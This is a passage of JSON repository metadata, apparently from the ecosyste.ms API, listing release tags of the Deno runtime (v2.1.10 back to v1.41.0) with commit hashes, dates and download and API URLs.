tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed